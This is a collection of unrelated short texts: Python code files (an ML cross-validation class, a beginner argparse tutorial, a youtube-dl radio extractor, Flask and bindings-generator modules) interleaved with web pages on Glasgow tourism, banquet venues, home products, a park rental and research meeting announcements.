formatted_interval = lambda column: "%.2f +/- %.4f" % (column.mean(), width(column))
return pandas.Series([formatted_interval(data[c]) for c in data.columns], index=data.columns)
class Experiment:
"""
Class for performing cross-validation of several classifiers on one dataset.
"""
def __init__(self, dataset):
self.dataset = dataset
self.classifiers = []
def add_classifier(self, cls, name=None):
if not name is None:
cls.name = name
self.classifiers.append(cls)
def run_with_classifier(self, cls, data_for_folds):
"""
Perform cross-validation with one classifier.
@param data_for_folds: Contains one list of True/False values for each of the folds to be run. Each list states
for every item of the dataset, whether the item is in the current fold part of the training dataset or the
test dataset.
@param cls: Classifier to use in the experiment.
@return: Measurements for quality and runtime metrics.
"""
runtimes = []
quality = []
for train, test in data_for_folds:
#get the training and testing data for this fold
data_train, data_test = self.dataset.data[train], self.dataset.data[test]
target_train, target_test = self.dataset.target[train], self.dataset.target[test]
#perform training
train_time = datetime.now()
cls = cls.fit(data_train, target_train)
train_time = delta_in_ms(datetime.now()-train_time)
#apply the classifier on the test data
test_time = datetime.now()
recommendations = cls.predict(data_test)
test_time = delta_in_ms(datetime.now()-test_time)
#add measurements for this replication to result collection
runtimes.append({"Training time": train_time,
"Overall testing time": test_time,
"Individual testing time": test_time/float(len(data_test))})
quality.append(QualityMetricsCalculator(target_test, recommendations).calculate())
#calculate statistics over all replications
return self.calculate_quality_stats(cls.name, quality), self.calculate_runtime_stats(cls.name, runtimes)
def run(self, folds=10):
"""
Run the experiment with all classifiers.
@param folds: How many folds to run, perform 10-fold cross validation by default. folds must be >=2
@return A `Results` object that can be used to print and plot experiment results.
"""
assert(folds >= 2)
#divide the data into the specified number of folds
data_for_folds = KFold(len(self.dataset.data), n_folds=folds, indices=False)
#run all of the classifiers and collect quality and runtime statistics
stats = [self.run_with_classifier(cls, data_for_folds) for cls in self.classifiers]
#group all quality stats in one big matrix, all runtime stats in another matrix
quality_stats = pandas.concat([quality for quality, runtime in stats], axis=1)
runtime_stats = pandas.concat([runtime for quality, runtime in stats])
return Results(self.classifiers, quality_stats, runtime_stats)
@staticmethod
def calculate_quality_stats(cls_name, collected_measurements):
#make a big matrix of all collected measurements over all replications and group according to the cutoff
m = pandas.concat(collected_measurements)
grouped = m.groupby(m.index)
#calculate stats and rename columns to include name of the statistic and classifier,
#e.g. Precision -> (Naive Bayes, Precision, Mean)
map_column_names = lambda stat: {metric: (cls_name, metric, stat) for metric in quality_metrics}
means = grouped.mean().rename(columns=map_column_names("Mean"))
std = grouped.std().rename(columns=map_column_names("Std deviation"))
conf = grouped.apply(confidence_interval).rename(columns=map_column_names("Confidence interval"))
return pandas.concat([means, std, conf], axis=1)
@staticmethod
def calculate_runtime_stats(cls_name, collected_measurements):
#make a big matrix of all collected measurements over all replications, no need to group anything here
m = pandas.DataFrame(collected_measurements, columns=runtime_metrics)
#calculate statistics, rename columns to include name of statistic, e.g. Training time -> (Training time, Mean)
means = pandas.DataFrame(m.mean()).transpose()
means.columns = [(metric, "Mean") for metric in runtime_metrics]
std = pandas.DataFrame(m.std()).transpose()
std.columns = [(metric, "Standard deviation") for metric in runtime_metrics]
conf = pandas.DataFrame(confidence_interval(m)).transpose()
conf.columns = [(metric, "Confidence interval") for metric in runtime_metrics]
#put all individual statistics together and set name of classifier as index
combined = pandas.concat([means, std, conf], axis=1)
combined.index = [cls_name]
return combined
class Results():
"""
Class that contains the results of a cross-validation experiment. Allows to print and to plot results.
"""
def __init__(self, classifiers, quality_stats, runtime_stats):
"""
@param classifiers: The classifiers that where used in the experiment.
@param quality_stats: A pandas dataframe with 12 columns for each classifier (one column for each possible
combination of collected quality metrics and calculated statistics). The index of the dataframe is the cutoff,
i.e. how many recommendations where shown to the user.
@param runtime_stats: A pandas dataframe with 9 columns for each classifier (one column for each possible
combination of collected runtime metrics and calculated statistics). The index of the dataframe are the names of
the tested classifiers.
@return:
"""
self.classifiers = classifiers
self.quality_stats = quality_stats
self.runtime_stats = runtime_stats
def compare_quality(self, metric, statistic, cutoff_results_at=None):
"""
Grab results for given metric and statistic for all tested classifiers.
@param metric: Name of one of the quality metrics.
@param statistic: Which statistic to compare (Mean, Standard deviation, Confidence interval)
@param cutoff_results_at: At any given time only a limited number of services can be available
and can be recommended, e.g. for 10 binary sensors, 10 services are typically available. The only anomaly is
right at the beginning of the dataset, where the current status of a sensor is not known, in this case more than
10 services can be recommended. However, there will be very few instances where this is the case and
recommendation results will be therefore be statistically insignificant. If this parameter is set to any other
value than None, the output will be restricted to show only results where the cutoff for the number of
recommendations to be shown lies between 1 and this parameter.
@return: A pandas dataframe with one column for every classifier, listing the calculated statistics for the
given metric and all cutoffs..
"""
assert(statistic in calculated_stats)
assert(metric in quality_metrics)
relevant_columns = [(cls.name, metric, statistic) for cls in self.classifiers]
new_column_names = [cls.name for cls in self.classifiers]
comparison = self.quality_stats[relevant_columns]
comparison = comparison.rename(columns={old: new for old, new in zip(relevant_columns, new_column_names)})
if not cutoff_results_at is None:
comparison = comparison.loc[1: cutoff_results_at]
return comparison
def print_quality_comparison(self, metrics=quality_metrics, cutoff_results_at=None):
"""
For each of the quality metrics, print a table of confidence intervals. One column for each tested classifier
and one row for each tested recommendation cutoff.
@param cutoff_results_at: see `self.compare_quality`
@param metrics: print comparison only for these metrics
@return:
"""
for metric in metrics:
print "Results for %s" % metric
print self.compare_quality(metric, "Confidence interval", cutoff_results_at)
def print_quality_comparison_at_cutoff(self, cutoff, metrics=quality_metrics):
"""
Print one shared table of confidence intervals for all of the quality metrics. One row for each tested classifier,
one column for each calculated quality metric. Cutoff the recommendation results at `cutoff`, i.e. the user is
at most shown `cutoff` recommendations.
@param cutoff: The cutoff for which to print the results.
@param metrics: print comparison only for these metrics
@return:
"""
comparison = {metric: self.compare_quality(metric, "Confidence interval").loc[cutoff]
for metric in metrics}
comparison = pandas.DataFrame(comparison)[metrics]
print comparison
def print_runtime_comparison(self, metrics=runtime_metrics):
"""
Print one shared table of confidence intervals for all runtime metrics. One row for each tested classifier,
one column for each calculated runtime metric.
@param metrics: print comparison only for these metrics
@return:
"""
relevant_columns = [(metric, "Confidence interval") for metric in metrics]
new_column_names = [metric for metric in metrics]
comparison = self.runtime_stats[relevant_columns]
comparison = comparison.rename(columns={old: new for old, new in zip(relevant_columns, new_column_names)})
print comparison
def plot_quality_comparison(self, plot_config, cutoff_results_at=None, metrics=quality_metrics):
"""
For each of the quality metrics, generate an XY-line-plot with one line for each classifier. The X-axis is the
number of recommendations that are shown to the user, the Y-axis is the metric of interest. Uses the means of
the measurements.
@param plot_config: A function that can be called to get the full path for a plot file.
@param cutoff_results_at: see `self.compare_quality`
@param metrics: plot comparison only for these metrics
@return:
"""
for metric in metrics:
results = self.compare_quality(metric, "Mean", cutoff_results_at)
plot.plot_quality_comparison(results, metric, plot_config)
|
EVENTS such as the Commonwealth Games, Radio 1's Big Weekend and the MTV EMAs saw the number of international and domestic tourists rise by 37 per cent.
THE number of tourists visiting Glasgow increased by 37 per cent last year, new figures have revealed.
High-profile events, including the Commonwealth Games, Radio 1's Big Weekend and the MTV EMAs helped attract 2.7 million international and domestic tourists to the city.
There was also a significant rise in visitor spending over the "incredible" 12 months for the city.
The figures, released by the Office for National Statistics (ONS), showed visitors spent £687 million - up 39 per cent from £495 million the previous year.
The majority of international tourists to Glasgow last year travelled from Europe and North America, while visitors from further afield, including China, India and Australia, totalled 19 per cent.
Most international tourists said they were in the city on holiday, whilst almost a quarter visited friends and relatives and 18 per cent were business travellers.
It sees Glasgow overtake Liverpool as the fifth most visited UK city by international tourists.
Scotland's largest city also and ranks ahead of Oxford, Bristol, Cambridge, Leeds, York, Cardiff and Newcastle.
New data from the Great Britain Tourism Survey also showed that domestic visitors made more than 2.1 million trips to Glasgow last year - a 56 per cent increase on the previous 12 months.
Councillor Gordon Matheson, leader of Glasgow City Council, said: "Tourism is a crucial pillar of Glasgow's economic strategy and these figures strongly reinforce our commitment to delivering a world-class visitor experience.
"2014 was an incredible year for Glasgow; it was the most exciting and high-profile period in our history.
"A key legacy of 2014 is that our global profile has never been greater. We're now firmly recognised as one of the world's must-visit destinations while the overwhelming success of the Commonwealth Games has ensured that we've become a first-choice host for major international events and conferences, with confirmed business on our books until 2022."
Last week, we told you that the Glasgow 2014 Commonwealth Games contributed more than £740 million to Scotland's economy.
The Post-Games report found that, over the eight years from winning the bid to hosting the event, the Games contributed more than £740 million gross to the country's economy, including £390 million for Glasgow 's economy.
It also supported on average 2,100 jobs each year from 2007 and 2014, including 1,200 on average in Glasgow.
We all love to enjoy a drink in the sunshine, so find out 8 top beer gardens in Glasgow.
Find out 11 facts you probably didn't know about Glasgow.
Find out how Nicola Sturgeon said Glasgow 2014 can "buck the trend" and secure a long-term Commonwealth Games legacy.
And look back on Glasgow 2014 one year on: 20 reasons why we loved the Commonwealth Games. |
# -*- coding: utf-8 -*-
#-------------------------------------------------------------------------------
#
# Description: Hello World!
# - vs 3 - Facilitando a execução do código passando parâmetros no momento
# da execução
#
# Author: @Palin
#
# Last Update: 10/2016
# Created: 10/2016
# Copyright: (c) Ampere Desenvolvimento 2016
#-------------------------------------------------------------------------------
# Sempre importe estes pacotes
import sys
import os
import math
# Tentando importar um pacote que PODE não estar instalado!
# Receita de Bolo! Use sempre o Try/Except
# Isso salva a vida do programador!
try:
# SOMENTE MUDE AQUI! - Coloque quantos pacotes quiser importar
import argparse
import matplotlib
except ImportError as e:
exc_type, exc_value, exc_traceback = sys.exc_info()
traceback_details = {
'filename': exc_traceback.tb_frame.f_code.co_filename,
'lineno': exc_traceback.tb_lineno,
'name': exc_traceback.tb_frame.f_code.co_name,
'type': exc_type.__name__
}
print("#" * 80)
print("# Descrição do Erro: " + str(e))
print(traceback_details)
print("#" * 80)
sys.exit()
# ----------------------
# Sempre documente o código
# Os comentários servem depois para gerar um HTML da documentação.
# Em geral a documentação do código é gerada pelo pacote Sphinx
#
# Objetivo: pegar o nome passado pelo prompt de comando
#
# ----------------------
def main():
# recebendo os parametros
# Se nada foi alterado - vieram os parametros padrao (default)!
lstArgs = parametros_prompt()
str_nome = lstArgs.str_recebe_nome
print_debug = lstArgs.flag_imprimir
dbl_raio = lstArgs.dbl_raio
print("Olá " + str_nome + ", seja bem-vindo!")
print("Dado o raio " + str(dbl_raio) + " o comprimento da circunferência = " + str(2*math.pi))
print("Dado o raio " + str(dbl_raio) + " a área da circunferência = " + str(math.pi * dbl_raio**2 ))
if print_debug:
print("Foi definido que era para imprimir o Debug!")
##------------------------------------------------------------------------------
## @@ Inicializa o Escritor de Log
##------------------------------------------------------------------------------
def parametros_prompt():
# --------------------------------------------------------------------------
# Utiliza o pacote argparse
# Recebe os PARAMETROS DE ENTRADA passados pelo usuario na EXECUCAO do
# --------------------------------------------------------------------------
""" Objetivo:
- Capturar os parametros do prompt e retorna-los em uma lista.
:Date: 10/2016
:Version: 1.0
:Authors: @Palin
:copyright: @Marcelo Palin
"""
## parser = argparse.ArgumentParser(
## prog = 'hello_03.py',
## description = "Minicurso Aprendendo Python - XXVIII SEMAT - Versao 1.0"
## + " Este programa recebe 2 parametros de entrada no momento da execucao."
## + " S",
## epilog = 'Para consultar o Help digite: python hello_03.py -h '
## )
# String em várias linhas utilize ''' ''' para envolver.
parser = argparse.ArgumentParser(
prog = 'hello_03.py',
description = '''Minicurso Aprendendo Python - XXVIII SEMAT - Versao 1.0
Este programa recebe 3 parametros de entrada no momento da execucao.
Sao eles: O Nome da pessoa, o raio de uma circunferencia e a flag
mostrar detalhes (debug).
\n exemplo de execução:
$ python hello_03.py -debug 1 -raio 2 -nome "Marcelo Palin"
''',
epilog = 'Para consultar o Help digite: python hello_03.py -h '
)
parser.add_argument('-v', '--version', action='version', version='%(prog)s vs. 1.0')
parser.add_argument('-raio', action='store', dest='dbl_raio', type=float, default=1.0)
parser.add_argument('-debug', action='store', dest='flag_imprimir', type=int, default=0) #0 = false, 1 = true
parser.add_argument('-nome', action='store', dest='str_recebe_nome', default="Palin" )
# Pega a lista de parametros passada no prompt de comando e armazena em uma lista
# Ex de execucao: python hello_03 -debug 0 -nome "Marcelo Palin"
lstArgs = parser.parse_args()
return lstArgs
##@fim do metodo
##----------------------------------------------------------------------------
# Quando executo o codigo, qual funcao devo chamar primeiro?
if __name__ == '__main__':
main()
|
Choosing the ideal venue for a corporate event is never easy. Even if you narrow things down to the most popular banquet halls in ECR, you’ll still find yourself with plenty of options to choose from.
The question being – which is the ideal banquet hall for your corporate event?
As every corporate event is unique, so too are the requirements of the respective business. Rather than following the pack, therefore, it’s important to consider what’s required and what’s preferable for your event specifically. The good news is that the more precise you are with the details, the easier it becomes to select and secure the ideal banquet hall.
First up, research suggests that the most common excuse among attendees for failing to attend corporate functions is poor accessibility. Unless guests can access your chosen banquet hall with ease, there’s a strong chance they simply won’t turn up. If possible, ensure you select a central location with the strongest possible public transport links. In addition, consider the special requirements of any attendees who may have mobility issues. If you have even the slightest concern regarding accessibility, you may want to look elsewhere.
If some or all of your delegates will require overnight accommodation, you’ll need to ensure it is provided and is conveniently accessible. Not a problem if you book your corporate event at the Hotel Mamallaa Heritage, but more of a challenge if you select a basic meeting room in the middle of nowhere. It’s unfair to expect your guests to once again make long and complicated journeys back to their lodgings at the end of the function. If nothing else, ensure that taxis or free shuttle service is made available for the convenience of your guests.
Booking as far in advance as possible should be considered mandatory, in order to avoid issues with availability. It’s worth remembering that prime banquet halls in desirable locations may be reserved more than one year ahead of time. It’s not to say that last-minute bookings are impossible, but quality slots are more difficult to come by as the date draws nearer. Ensure you book as far in advance as realistically possible, though be sure to ask the provider’s policy regarding cancellations or modifications at a later date.
Not every facility is ideally suited to every type of event. It’s therefore up to you to ensure that the image and general suitability of the venue you choose are a good match for your business. Venues vary from the most formal and sophisticated banquet halls to the most relaxing and enjoyable social spaces imaginable. You may also have the option of organizing an indoor or outdoor event, in accordance with your requirements and the time of year.
All cost considerations should center on value for money, as opposed to the lowest possible prices. It’s one thing to book a banquet hall for next to nothing, but not at the expense of an effective event that meets its objectives. Always consider what you’re actually getting for your money, but don’t be afraid to negotiate. Particularly if looking to arrange regular meetings at the same venue, it’s only fair that the provider offers some kind of special deal or discount.
The extent to which your delegates will be provided with wall-to-wall a service is entirely up to you. Set out a buffet, organize a formal dinner or whatever suits the event. In all instances, you’ll need to think carefully about the staff and support required to ensure the event goes off without a hitch. Some venues provide all the staff you’ll need, while others invite clients to bring their own third-party staff and catering teams along for the ride.
Speaking of which, if you do decide to go with the venue’s in-house catering offer, you need to ensure that it is of a sufficient quality standard. Not to mention, caters to delegates who may have allergies, intolerances or specific dietary preferences of any kind. Once again, it’s important to address such issues as early as possible, submitting requests and asking questions long in advance of the event.
Take nothing for granted when it comes to equipment, instead of asking as many questions as necessary. Just because the venue has a contingency of audio-visual equipment doesn’t mean it will be up to the standard you require. Request specific assurances regarding the quality and capabilities of the equipment available. In addition, consider the wider facilities at the venue you’re considering, which incorporates everything from cloakrooms to bathrooms to parking and so on.
If the facility is accessible for you personally, it’s in your best interests to check it out in-person before finalizing your booking. The reason being that what appears to be a polished and professional corporate venue on-paper may not live up to expectations in the flesh. Take the time to organize a tour of the facility, during which you should have the opportunity to ask as many questions as necessary.
Last but not least, spend at least a little time online searching for reviews and recommendations from past customers. You could also ask the venue to provide its own references, or case studies detailing similar events organized before. Establish what kind of feedback the venue has accrued over the years and consider the consensus. If customer reviews paint a positive picture of the venue, you’re probably in safe hands. |
"""Comment sheet."""
from colander import deferred
from substanced.util import find_service
from adhocracy_core.interfaces import ISheet
from adhocracy_core.interfaces import ISheetReferenceAutoUpdateMarker
from adhocracy_core.interfaces import SheetToSheet
from adhocracy_core.sheets import add_sheet_to_registry
from adhocracy_core.schema import MappingSchema
from adhocracy_core.schema import Integer
from adhocracy_core.schema import PostPool
from adhocracy_core.schema import Reference
from adhocracy_core.schema import Text
from adhocracy_core.sheets import sheet_meta
class IComment(ISheet, ISheetReferenceAutoUpdateMarker):
"""Marker interface for the comment sheet."""
class ICommentable(ISheet, ISheetReferenceAutoUpdateMarker):
"""Marker interface for resources that can be commented upon."""
class CommentRefersToReference(SheetToSheet):
"""Reference from comment version to the commented-on item version."""
source_isheet = IComment
source_isheet_field = 'refers_to'
target_isheet = ICommentable
class CommentSchema(MappingSchema):
"""Comment sheet data structure.
`content`: Text
"""
refers_to = Reference(reftype=CommentRefersToReference)
content = Text()
# TODO add post_pool validator
comment_meta = sheet_meta._replace(isheet=IComment,
schema_class=CommentSchema)
@deferred
def deferred_default_comment_count(node: MappingSchema, kw: dict) -> str:
"""Return comment_count of the current `context` resource."""
context = kw['context']
catalogs = find_service(context, 'catalogs')
return catalogs.get_index_value(context, 'comments')
class CommentableSchema(MappingSchema):
"""Commentable sheet data structure.
`post_pool`: Pool to post new :class:`adhocracy_sample.resource.IComment`.
"""
comments_count = Integer(readonly=True,
default=deferred_default_comment_count)
post_pool = PostPool(iresource_or_service_name='comments')
commentable_meta = sheet_meta._replace(
isheet=ICommentable,
schema_class=CommentableSchema,
editable=False,
creatable=False,
)
def includeme(config):
"""Register sheets."""
add_sheet_to_registry(comment_meta, config.registry)
add_sheet_to_registry(commentable_meta, config.registry)
|
These corbels are made with Hydrostone, an rugged material made of gypsum and silica sand. They can be finished to re-create the look of old stone (as shown in photo) or with a faux marble finish.
The manufacturer promises that they're sturdy enough for use for bookshelves or mantels.
Big Antique Corbels measure 12" x 9" x 5".
Price is $145 for one or $235 for two (November 2006).
Get Design Daveluycontact information, plus see product reviews we've published about the company. |
#!/usr/bin/env python
import os
import unittest
from mi.logging import log
from mi.dataset.driver.ctdav_n.auv.ctdav_n_auv_telemetered_driver import parse as parse_telemetered
from mi.dataset.driver.ctdav_n.auv.ctdav_n_auv_recovered_driver import parse as parse_recovered
from mi.dataset.driver.ctdav_n.auv.resource import RESOURCE_PATH
from mi.dataset.dataset_driver import ParticleDataHandler
__author__ = 'Rene Gelinas'
class DriverTest(unittest.TestCase):
source_file_path = os.path.join(RESOURCE_PATH, 'subset_reduced.csv')
def test_telemetered_deprecation(self):
particle_data_handler = parse_telemetered(None, self.source_file_path, ParticleDataHandler())
log.info("SAMPLES: %s", particle_data_handler._samples)
log.info("FAILURE: %s", particle_data_handler._failure)
self.assertEquals(particle_data_handler._failure, False)
def test_recovered_deprecation(self):
particle_data_handler = parse_recovered(None, self.source_file_path, ParticleDataHandler())
log.info("SAMPLES: %s", particle_data_handler._samples)
log.info("FAILURE: %s", particle_data_handler._failure)
self.assertEquals(particle_data_handler._failure, False)
if __name__ == '__main__':
test = DriverTest('deprecation_tests')
test.test_telemetered_deprecation()
test.test_recovered_deprecation()
|
Melody Park is a six acre venue found in Hagerstown, Maryland. It features a 4,000 square foot pavilion with an 800 square foot concession area. The park is located in a secluded setting off of Greencastle Pike. Running through the park, you will find the serene Traupe Run stream that passes under two walking bridges. Our site can accommodate hundreds for picnics, concerts, car shows, or just about any special event!
Please browse our website to see the different features of Melody Park! Check out our Facebook page as well by clicking on the Facebook icon in the upper right corner!
Click below to rent Melody Park! |
# coding: utf-8
from __future__ import unicode_literals
import re
from .common import InfoExtractor
from ..utils import (
determine_ext,
unescapeHTML,
)
class CJSWIE(InfoExtractor):
_VALID_URL = r'https?://(?:www\.)?cjsw\.com/program/(?P<program>[^/]+)/episode/(?P<id>\d+)'
_TESTS = [{
'url': 'http://cjsw.com/program/freshly-squeezed/episode/20170620',
'md5': 'cee14d40f1e9433632c56e3d14977120',
'info_dict': {
'id': '91d9f016-a2e7-46c5-8dcb-7cbcd7437c41',
'ext': 'mp3',
'title': 'Freshly Squeezed – Episode June 20, 2017',
'description': 'md5:c967d63366c3898a80d0c7b0ff337202',
'series': 'Freshly Squeezed',
'episode_id': '20170620',
},
}, {
# no description
'url': 'http://cjsw.com/program/road-pops/episode/20170707/',
'only_matching': True,
}]
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
program, episode_id = mobj.group('program', 'id')
audio_id = '%s/%s' % (program, episode_id)
webpage = self._download_webpage(url, episode_id)
title = unescapeHTML(self._search_regex(
(r'<h1[^>]+class=["\']episode-header__title["\'][^>]*>(?P<title>[^<]+)',
r'data-audio-title=(["\'])(?P<title>(?:(?!\1).)+)\1'),
webpage, 'title', group='title'))
audio_url = self._search_regex(
r'<button[^>]+data-audio-src=(["\'])(?P<url>(?:(?!\1).)+)\1',
webpage, 'audio url', group='url')
audio_id = self._search_regex(
r'/([\da-f]{8}-[\da-f]{4}-[\da-f]{4}-[\da-f]{4}-[\da-f]{12})\.mp3',
audio_url, 'audio id', default=audio_id)
formats = [{
'url': audio_url,
'ext': determine_ext(audio_url, 'mp3'),
'vcodec': 'none',
}]
description = self._html_search_regex(
r'<p>(?P<description>.+?)</p>', webpage, 'description',
default=None)
series = self._search_regex(
r'data-showname=(["\'])(?P<name>(?:(?!\1).)+)\1', webpage,
'series', default=program, group='name')
return {
'id': audio_id,
'title': title,
'description': description,
'formats': formats,
'series': series,
'episode_id': episode_id,
}
|
This is a placeholder page for Mark Garner, which means this person is not currently on this site. We do suggest using the tools below to find Mark Garner.
You are visiting the placeholder page for Mark Garner. This page is here because someone used our placeholder utility to look for Mark Garner. We created this page automatically in hopes Mark Garner would find it. If you are not Mark Garner, but are an alumni of Brunswick High School Brunswick, GA, register on this site for free now. |
import os
import logging
from logging import Formatter
from logging.handlers import RotatingFileHandler
from flask import Flask
from flask.ext.sqlalchemy import SQLAlchemy
from flask.ext.login import LoginManager
from flask.ext.pagedown import PageDown
app = Flask(__name__)
app.config.from_object('bloks.config')
# Check for various necessary configuration keys
assert 'BLOG_TITLE' in app.config, 'No BLOG_TITLE config value found'
assert 'BLOG_DESCRIPTION' in app.config, 'No BLOG_DESCRIPTION config value found'
assert 'SECRET_KEY' in app.config, 'No SECRET_KEY config value found'
assert 'LOG_PATH' in app.config, 'No LOG_PATH config value found'
# Initialize logging handler
handler = RotatingFileHandler(app.config['LOG_PATH'], maxBytes=1000, backupCount=1)
handler.setFormatter(Formatter('%(asctime)s %(levelname)s: %(message)s'))
handler.setLevel(logging.INFO)
app.logger.addHandler(handler)
# Initialize PageDown
pagedown = PageDown(app)
# Initialize SQLAlchemy database
db = SQLAlchemy(app)
# Initialize LoginManager
lm = LoginManager()
lm.init_app(app)
from . import utils
from .models import Link
app.jinja_env.globals.update(render_markdown=utils.render_markdown)
app.jinja_env.globals.update(join=os.path.join)
app.jinja_env.globals.update(link_query=Link.query.all)
from . import views, admin_views, errors, models
__all__ = ['views', 'admin_views', 'errors', 'models', ]
|
A spa in your own home. Royal care series Luxurious shower and steam systems are equipped with everything you need for total and complete relaxation. The multi-jet shower enclosure, comes with an ultra quick heating 3KW steam generator, Multiple body massage jets, a drenching 8 in. wide Rainfall shower head, and a hand held shower head with adjustable settings for many different water spray patterns. It also comes with a Wireless media center that allows you to play your favorite music, talk shows, sporting events, etc. from the radio, MP3, CD, IPods , and even your cell phone, Additionally, the multi colored led lights illuminate the aroma therapy filled steam to create the ultimate relaxation experience.
Homeward Bath video Introduces luxurious shower and steam systems that offer unmatched quality and workmanship. Gives ideas about design, installation and finishing touches. |
#!/usr/bin/env python
#
# @file CMakeFiles.py
# @brief class for generating the cmake files
# @author Frank Bergmann
# @author Sarah Keating
#
# <!--------------------------------------------------------------------------
#
# Copyright (c) 2013-2015 by the California Institute of Technology
# (California, USA), the European Bioinformatics Institute (EMBL-EBI, UK)
# and the University of Heidelberg (Germany), with support from the National
# Institutes of Health (USA) under grant R01GM070923. All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
#
# Neither the name of the California Institute of Technology (Caltech), nor
# of the European Bioinformatics Institute (EMBL-EBI), nor of the University
# of Heidelberg, nor the names of any contributors, may be used to endorse
# or promote products derived from this software without specific prior
# written permission.
# ------------------------------------------------------------------------ -->
from util import global_variables
from . import DowncastExtensionFile
from . import DowncastNamespaceFile
from . import DowncastPackagesFile
from . import DowncastPluginsFile
from . import NativeSwigFile
from . import BaseBindingsFiles
class BindingFiles():
"""Class for all Bindings files"""
def __init__(self, pkg_object, binding, verbose=False):
# # members from object
self.package = pkg_object['name']
self.verbose = verbose
self.binding = binding
self.language = global_variables.language
self.elements = pkg_object['baseElements']
self.plugins = pkg_object['plugins']
#########################################################################
# package files
def write_downcast_extension(self):
if not global_variables.is_package:
return
name = 'local-downcast-extension-{0}'.format(self.package)
ext = DowncastExtensionFile.DowncastExtensionFile(name,
self.package,
self.binding)
if self.verbose:
print('Writing file {0}'.format(ext.fileout.filename))
ext.write_file()
ext.close_file()
def write_downcast_namespace(self):
if not global_variables.is_package:
return
name = 'local-downcast-namespaces-{0}'.format(self.package)
ext = DowncastNamespaceFile.DowncastNamespaceFile(name,
self.package,
self.binding)
if self.verbose:
print('Writing file {0}'.format(ext.fileout.filename))
ext.write_file()
ext.close_file()
def write_downcast_packages(self):
if not global_variables.is_package:
return
if self.binding == 'csharp' or self.binding == 'java':
name = 'local-packages-{0}'.format(self.package)
else:
name = 'local-downcast-packages-{0}'.format(self.package)
ext = DowncastPackagesFile.DowncastPackagesFile(name,
self.package,
self.binding,
self.elements,
self.plugins)
if self.verbose and ext.fileout:
print('Writing file {0}'.format(ext.fileout.filename))
ext.write_file()
ext.close_file()
def write_downcast_plugins(self):
if not global_variables.is_package:
return
name = 'local-downcast-plugins-{0}'.format(self.package)
ext = DowncastPluginsFile.DowncastPluginsFile(name,
self.package,
self.binding,
self.plugins)
if self.verbose and ext.fileout:
print('Writing file {0}'.format(ext.fileout.filename))
ext.write_file()
ext.close_file()
#########################################################################
# local files
def write_local(self):
if global_variables.is_package:
self.write_local_package_files()
else:
self.write_local_library_files()
def write_local_package_files(self):
if self.binding == 'csharp' or self.binding == 'java':
return
else:
name = 'local-{0}'.format(self.package)
ext = DowncastPackagesFile.DowncastPackagesFile(name,
self.package,
self.binding,
self.elements,
self.plugins,
True)
if self.verbose and ext.fileout:
print('Writing file {0}'.format(ext.fileout.filename))
ext.write_file()
ext.close_file()
def write_local_library_files(self):
base_files = BaseBindingsFiles.BaseBindingsFiles(self.elements,
self.binding, True)
base_files.write_files()
########################################################################
# write files in the swig directory
def write_swig_files(self):
if global_variables.is_package:
self.write_swig_package_files()
else:
self.write_swig_library_files()
def write_swig_package_files(self):
name = '{0}-package'.format(self.package)
ext = NativeSwigFile.NativeSwigFile(name, self.package, self.elements,
self.plugins, is_header=True)
if self.verbose and ext.fileout:
print('Writing file {0}'.format(ext.fileout.filename))
ext.write_file()
ext.close_file()
name = '{0}-package'.format(self.package)
ext = NativeSwigFile.NativeSwigFile(name, self.package, self.elements,
self.plugins, is_header=False)
if self.verbose and ext.fileout:
print('Writing file {0}'.format(ext.fileout.filename))
ext.write_file()
ext.close_file()
def write_swig_library_files(self):
base_files = BaseBindingsFiles.BaseBindingsFiles(self.elements,
'swig', True)
base_files.write_files()
########################################################################
# other library files
def write_cmake_file(self):
if global_variables.is_package:
return
base_files = BaseBindingsFiles.BaseBindingsFiles(self.elements,
self.binding, True)
base_files.write_files()
########################################################################
def write_files(self):
if self.binding != 'swig':
self.write_downcast_extension()
self.write_downcast_namespace()
self.write_downcast_packages()
self.write_downcast_plugins()
self.write_local()
else:
self.write_swig_files()
|
Catania (Sicily) is the location elected for the next Working Group Meetings. The four groups will meet at Principe hotel and Monastero Benedettini from 19th to 20th of October 2015.
The first day will take place the individual WG meetings at Principe Hotel. In the afternoon will be the turn of the steering board meeting.
The Annual Management Committee Meeting and Working group Meetings were held in Le Pecq, Paris, from 14th to 16th of April 2015. Samuel Martin, MC member from Suez Environment, led the local organisation.
Over 70 participants met in Verona (Italy) to held the annual Management Committee Meeting and Working Group Meetings.
Both meetings were located in Polo Didattico“Giorgio Zanotto” at University of Verona.
The 4 working groups had first reunions separately, after a short coffee break, all WGs got together for conclusions. The Management Committee meeting started the 23rd, after lunch.
The first workshop of WP3 “Environmental and Economic Impact” took place in Garmisch-Partenkirchen (Germany). The aims of the workshop were to consolidate the task forces defined during the Thraki Palace conference in order to tackle the biggest problems concerning ecological and economic impact of future wastewater treatment plants, to review the state of the art and to shape our ideas on micropollutants, greenhouse gases and odors, and concepts for recycled water reuse.
In total, 21 participants attended workshop (details in the attendant list) from 11 countries. |
# -*- coding: utf-8 -*-
#
# Copyright (C) University College London, 2013, all rights reserved.
#
# This file is part of FabMD and is CONFIDENTIAL. You may not work
# with, install, use, duplicate, modify, redistribute or share this
# file, or any part thereof, other than as allowed by any agreement
# specifically made by you with University College London.
#
from fab import *
@task
def lammps(config,**args):
"""Submit a LAMMPS job to the remote queue.
The job results will be stored with a name pattern as defined in the environment,
e.g. cylinder-abcd1234-legion-256
config : config directory to use to define geometry, e.g. config=cylinder
Keyword arguments:
cores : number of compute cores to request
images : number of images to take
steering : steering session i.d.
wall_time : wall-time job limit
memory : memory per node
"""
with_config(config)
execute(put_configs,config)
